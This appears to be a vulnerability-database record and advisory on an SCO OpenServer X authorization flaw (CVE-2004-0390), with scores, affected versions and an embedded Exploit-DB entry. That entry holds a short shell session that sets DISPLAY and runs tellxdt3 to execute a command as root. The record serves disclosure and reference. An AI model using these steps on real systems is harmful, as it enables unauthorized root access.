ID: OSVDB:6078
Type: osvdb
Reporter: Kevin Finisterre (kf@digitalmunition.com)
Modified: 2004-04-07T04:12:07
Description
Vulnerability Description
OpenServer contains a flaw that may allow a malicious user to bypass X authorization. The issue is triggered when X is launched by a method other than scologin. The flaw may allow unauthorized access, resulting in a loss of integrity.
Solution Description
Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.
{"type": "osvdb", "published": "2004-04-07T04:12:07", "href": "https://vulners.com/osvdb/OSVDB:6078", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 0, "edition": 1, "reporter": "Kevin Finisterre(kf@digitalmunition.com)", "title": "SCO OpenServer X Display Xauthority Bypass", "affectedSoftware": [{"operator": "eq", "version": "5.0.7", "name": "OpenServer"}, {"operator": "eq", "version": "5.0.6", "name": "OpenServer"}, {"operator": "eq", "version": "5.0.5", "name": "OpenServer"}], "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2017-04-28T13:20:00", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0390"]}, {"type": "exploitdb", "idList": ["EDB-ID:20851"]}], "modified": "2017-04-28T13:20:00", "rev": 2}, "vulnersScore": 6.1}, "references": [], "id": "OSVDB:6078", "lastseen": "2017-04-28T13:20:00", "cvelist": ["CVE-2004-0390"], "modified": "2004-04-07T04:12:07", "description": "## Vulnerability Description\nOpenServer contains a flaw that may allow a malicious user to bypass X authorization. The issue is triggered when a different method than scologin is used to launch X. It is possible that the flaw may allow unauthorized access resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.\n## Short Description\nOpenServer contains a flaw that may allow a malicious user to bypass X authorization. The issue is triggered when a different method than scologin is used to launch X. 
It is possible that the flaw may allow unauthorized access resulting in a loss of integrity.\n## References:\n[Secunia Advisory ID:11586](https://secuniaresearch.flexerasoftware.com/advisories/11586/)\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.5/SCOSA-2004.5.txt\n[CVE-2004-0390](https://vulners.com/cve/CVE-2004-0390)\n"}
{"cve": [{"lastseen": "2021-02-02T05:22:58", "description": "SCO OpenServer 5.0.5 through 5.0.7 only supports Xauthority style access control when users log in using scologin, which allows remote attackers to gain unauthorized access to an X session via other X login methods.", "edition": 4, "cvss3": {}, "published": "2004-12-31T05:00:00", "title": "CVE-2004-0390", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0390"], "modified": "2017-07-11T01:30:00", "cpe": ["cpe:/o:sco:openserver:5.0.7", "cpe:/o:sco:openserver:5.0.6", "cpe:/o:sco:openserver:5.0.5"], "id": "CVE-2004-0390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0390", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:sco:openserver:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:sco:openserver:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:sco:openserver:5.0.6:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T15:08:39", "description": "SCO OpenServer 5.0.x StartX Weak XHost Permissions Vulnerability. CVE-2004-0390. 
Local exploit for sco platform", "published": "2001-05-07T00:00:00", "type": "exploitdb", "title": "SCO OpenServer 5.0.x StartX Weak XHost Permissions Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0390"], "modified": "2001-05-07T00:00:00", "id": "EDB-ID:20851", "href": "https://www.exploit-db.com/exploits/20851/", "sourceData": "source: http://www.securityfocus.com/bid/2731/info\r\n\r\nOpenServer is a Unix based operating system distributed by Santa Cruz Operations.\r\n\r\nA problem in access control of the X server could allow a local user to gain elevated privileges. When the X Window System is started via the xhost script, insufficient xhost access control allows a user to execute commands on the desktop. This can be exploited by setting the display environment variable, and using the tellxdt3 program.\r\n\r\nThis problem makes it possible for a local user to execute commands as root. \r\n\r\n$ pwd\r\n/usr/lib/X11/IXI/XDesktop/bin/i3sc0322\r\n$ DISPLAY=localhost:0\r\n$ export DISPLAY\r\n$ id\r\nuid=232(kevin) gid=101(supp) groups=101(supp),50(group)\r\n$ ./tellxdt3 /usr/bin/id\r\n*** Can't open message catalogue XDesktop3\r\nuid=0(root) gid=3(sys) groups=3(sys),1(other) ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20851/"}]}